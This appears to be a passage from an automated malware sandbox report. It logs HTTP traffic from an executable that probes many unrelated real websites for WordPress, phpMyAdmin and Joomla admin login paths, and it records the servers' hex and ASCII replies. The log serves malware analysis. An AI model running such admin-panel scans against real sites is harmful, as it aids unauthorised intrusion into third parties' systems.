                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 73 74 75 64 65 6e 74 2e 64 65 62 72 69 74 74 6f 2e 73 63 68 2e 69 64 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@student.debritto.sch.id to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    77192.168.2.455673120.88.73.238806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.544866085 CET239OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.905981064 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 138
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://my.calvary.qld.edu.au/administrator/
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    78192.168.2.456009162.250.126.5806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.676503897 CET235OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: directlendersllc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.776627064 CET1003INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                    content-length: 707
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    location: https://mydirectlender.com/phpMyAdmin/
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    79192.168.2.455992185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.750567913 CET239OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: federwild.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.938448906 CET947INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Last-Modified: Thu, 12 Sep 2019 15:06:38 GMT
                                                                                                                                                                                                    ETag: W/"3fe-5925c7bf8c9e3"
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    80192.168.2.45600834.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.756050110 CET231OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: micro-design.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.937321901 CET321INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 46 6f 72 20 73 65 63 75 72 69 74 79 20 72 65 61 73 6f 6e 73 2c 20 74 68 69 73 20 55 52 4c 20 69 73 20 6f 6e 6c 79 20 61 63 63 65 73 73 69 62 6c 65 20 75 73 69 6e 67 20 6c 6f 63 61 6c 68 6f 73 74 20 28 31 32 37 2e 30 2e 30 2e 31 29 20 61 73 20 74 68 65 20 68 6f 73 74 6e 61 6d 65 2e
                                                                                                                                                                                                    Data Ascii: For security reasons, this URL is only accessible using localhost (127.0.0.1) as the hostname.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    81192.168.2.456067162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.771070004 CET296OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://lumaruniformes.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.887336016 CET280INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 83
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    82192.168.2.456077104.26.12.245806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.839076042 CET231OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.980423927 CET699INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 06:59:31 GMT
                                                                                                                                                                                                    Location: https://hightideinc.com/wp-login.php
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=weesGW5ANIqz368FmyIk7%2BqeFJ7tcAWLrVuxOjeBbhacvN6j%2B%2FFLgEOd6Xuwp8u5bv3LxfwQ7MSFJeVVQdU808gYQw0fsJEw1a9lkoP98PFYdxtDweJNg5yLKQbCTs9klQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 82bfe7e83ba00a11-IAD
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    83192.168.2.456063103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.839148998 CET226OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: ondania.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.005767107 CET396INHTTP/1.1 302 Found
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    server: Apache
                                                                                                                                                                                                    set-cookie: __tad=1700978371.6842526; expires=Wed, 23-Nov-2033 05:59:31 GMT; Max-Age=315360000
                                                                                                                                                                                                    location: http://ww38.ondania.com/phpMyAdmin/?subid1=20231126-1659-3187-9499-03d21ba245df
                                                                                                                                                                                                    content-length: 2
                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                    connection: close
                                                                                                                                                                                                    Data Raw: 0a 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    84192.168.2.456070185.54.192.125806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.841475010 CET228OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: talentius.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.013397932 CET588INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                    Location: https://talentius.com/PhpMyAdmin/
                                                                                                                                                                                                    Content-Length: 320
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://talentius.com/PhpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at talentius.com Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    85192.168.2.45624215.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.949333906 CET231OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: greenrworld.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.047055006 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-122-167.ec2.internal
                                                                                                                                                                                                    X-Request-Id: f953fd7d-07e5-4972-a064-412a9ffdaf9e
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.048074961 CET274OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: greenrworld.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://greenrworld.com/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.147106886 CET418INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-122-17.ec2.internal
                                                                                                                                                                                                    X-Request-Id: d75c36b2-cac0-4124-ba0b-f91fc196e22d
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    86192.168.2.4562743.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.965883017 CET227OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gmailvz.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.066637039 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 1177
                                                                                                                                                                                                    Last-Modified: Mon, 13 Nov 2023 23:35:06 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "6552b2aa-499"
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Im0dahsh1K54ucJbpmt1XaL0UPGYQFzyxf31DghrxYIoSp58Qw0ng1SKlZpD76Zxe16REbUJlDfdVT6BYTU5Vg
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
